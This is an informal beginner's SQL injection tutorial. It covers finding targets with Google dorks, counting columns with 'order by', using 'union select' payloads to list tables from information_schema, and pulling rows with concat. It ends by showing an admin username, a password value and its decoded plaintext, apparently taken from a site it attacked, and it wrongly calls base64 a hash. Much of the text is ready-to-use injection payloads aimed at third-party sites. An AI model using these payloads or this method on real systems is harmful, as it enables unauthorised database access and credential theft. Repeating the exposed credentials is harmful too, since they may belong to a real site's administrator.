Mynoodmanualsqlinjec

Mynoodmanualsqlinjec

1= check vul (using google dorks of course)
      so i found a target and i'll excute on it 
      we'll check it by adding 'or'



2= order injections {
	               
	               +order+by+1
	               order by 1
	               +order+by+1--
}    so we will add number from 1 to 100 to guess number of the vulnerable tables
     the error message we be seems like Unknown numbers of columns or sum like this
     so in the number of 7 shown the error msg so the numbers of the tables is 6





3= union injections (table_name from information_schema.tables && column_name,3 from information_schema.columns where table_name='users') {
	                      we'll inject those codes
	                         union select 1,2,3,4,5,6
	                         union all select 1,2,3,4,5,6
	                         union select 1,2,3,4,5,6--
	                         +union+select 1,2,3,4,5,6
	                         +union+all+select 1,2,3,4,5,6

	                         to show us the vulnerable columns

	                         so you see the vulnerable columns are 4 & 6
	                         we'll inject in them 

	                         so the purpose of tis injection is to know the names of the tables in the database
	                         there's a table name with 'users' whoch we'll find users data on it

	                         now to know the data on this table we'll inject 
	                         folow me



}
4= using concat(1st ,0x3a, 2nd ,0x3a, ...) this is the final step to extract the data 
we write concat(1st column , 2nd colum , 3rd column)



so you we extract the data with id 1 and username admin and password TSphIWx1QDUla0BwIUw=
the password is hashed by base64 (perhapse)

so the pwd is M*a!lu@5%k@p!L